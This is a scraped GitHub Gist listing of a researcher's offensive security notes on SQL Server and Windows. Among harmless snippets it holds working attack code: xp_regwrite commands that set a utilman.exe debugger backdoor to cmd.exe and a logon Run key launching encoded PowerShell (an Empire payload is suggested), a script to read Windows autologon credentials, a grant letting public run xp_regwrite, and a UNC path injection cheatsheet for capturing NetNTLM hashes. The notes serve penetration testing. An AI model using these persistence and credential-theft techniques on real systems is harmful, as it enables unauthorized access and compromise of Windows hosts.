Scott Sutherland nullbind

View GitHub Profile
@nullbind
nullbind / Identify Shared SA Accounts
Created September 12, 2016 18:34
Testing for shared SA account without knowing the password.
Below is an overview of how to test for shared SA accounts in SQL Server without knowing the password.
Requirements
- sysadmin privileges on SQL Server
Process
- Dump SPNs or provide a list of SQL Servers
- Enable ad hoc queries, or create a linked server to each SQL Server on the target list
- Submit a query to each SQL Server; if the sa password is the same as on the local instance, the query will succeed.
nullbind / ADFS Notes
Last active March 19, 2020 16:52
ADFS Notes
Below are some notes for grabbing a list of domain users and other information via ADFS using acquired credentials.
Install Apps
Download and install Visual Studio 10
Download and install the Lync SDK
https://www.microsoft.com/en-us/download/details.aspx?id=36824 (deprecated)
http://go.microsoft.com/fwlink/?LinkID=248583
nullbind / xp_regwrite - allow non sysadmin execution
Last active February 15, 2021 10:28
SQL Server registry hack that allows non-sysadmin logins to use xp_regwrite to access sensitive registry locations.
Below is a basic SQL Server registry hack that allows non-sysadmin logins to use xp_regwrite to access sensitive registry locations.
Scenario
--------
Give public role members privileges to execute xp_regwrite.
GRANT EXEC ON OBJECT::master.dbo.xp_regwrite TO [Public]
Issue
-----
nullbind / reg_persist2.sql
Last active September 16, 2019 04:58
run defined debugger instead of intended command
-- This will create a registry key through SQL Server (as sysadmin)
-- to run a defined debugger (any command) instead of the intended command.
-- In the example, utilman.exe is replaced with cmd.exe, which can then be executed on demand via RDP.
-- Note: the debugger value could easily be an Empire or other payload.
EXEC master..xp_regwrite
@rootkey = 'HKEY_LOCAL_MACHINE',
@key = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe',
@value_name = 'Debugger',
@type = 'REG_SZ',
@value = '"c:\windows\system32\cmd.exe"'
nullbind / reg_persist1.sql
Last active September 16, 2019 04:58
Use SQL Server xp_regwrite to configure a file to run when users login
---------------------------------------------
-- Use SQL Server xp_regwrite to configure
-- a file to execute a PowerShell encoded command when users log in
----------------------------------------------
EXEC master..xp_regwrite
@rootkey = 'HKEY_LOCAL_MACHINE',
@key = 'Software\Microsoft\Windows\CurrentVersion\Run',
@value_name = 'EvilSauce',
@type = 'REG_SZ',
@value = '"PowerShell -ENC <encodedcommand>"'
nullbind / Get-SQLWinAutoLoginCreds.sql
Last active September 16, 2019 04:58
Get the Windows auto login credentials through SQL Server
-- Get the Windows auto login credentials through SQL Server using xp_regread
-- Requires sysadmin privileges
-- Reference: https://support.microsoft.com/en-us/kb/887165
-------------------------------------------------------------------------
-- Get Windows Auto Login Credentials from the Registry
-------------------------------------------------------------------------
-- Get AutoLogin Default Domain
DECLARE @AutoLoginDomain SYSNAME
nullbind / processing
Created August 2, 2016 21:44
processing
# Play 101 short beeps with random frequencies and increasing duration
0..100 | ForEach-Object {
    $x = 37 + (Get-Random 4000)   # frequency in Hz (Console.Beep requires >= 37)
    $y = 37 + $_                  # duration in milliseconds
    [console]::beep($x, $y)
}
nullbind / SQL Server UNC Path Injection Cheatsheet
Last active March 1, 2025 19:51
SQL Server UNC Path Injection Cheatsheet
This is a list of SQL Server commands that support UNC path injections by default.
The injections can be used to capture or replay the NetNTLM password hash of the
Windows account used to run the SQL Server service. The SQL Server service account
has sysadmin privileges by default in all versions of SQL Server.
Note: This list is most likely not complete.
-----------------------------------------------------------------------
-- UNC Path Injections Executable by the Public Fixed Server Role
-----------------------------------------------------------------------
nullbind / Modified Invoke-Parallel
Last active September 16, 2019 04:58
Modified Invoke-Parallel
# Modified version of https://github.com/RamblingCookieMonster/Invoke-Parallel
# Added an option to import all of the current session's functions into the runspace session state
function Invoke-Parallel {
<#
.SYNOPSIS
Function to control parallel processing using runspaces
.DESCRIPTION
Function to control parallel processing using runspaces
# Modified example from: https://blogs.technet.microsoft.com/heyscriptingguy/2015/11/28/beginning-use-of-powershell-runspaces-part-3/
# Added import of all current session functions into the session state for the runspace pool
# --------------------------------------------------
#region - Setup custom functions
# --------------------------------------------------
# Create custom function to import into runspace session state
Function ConvertTo-Hex {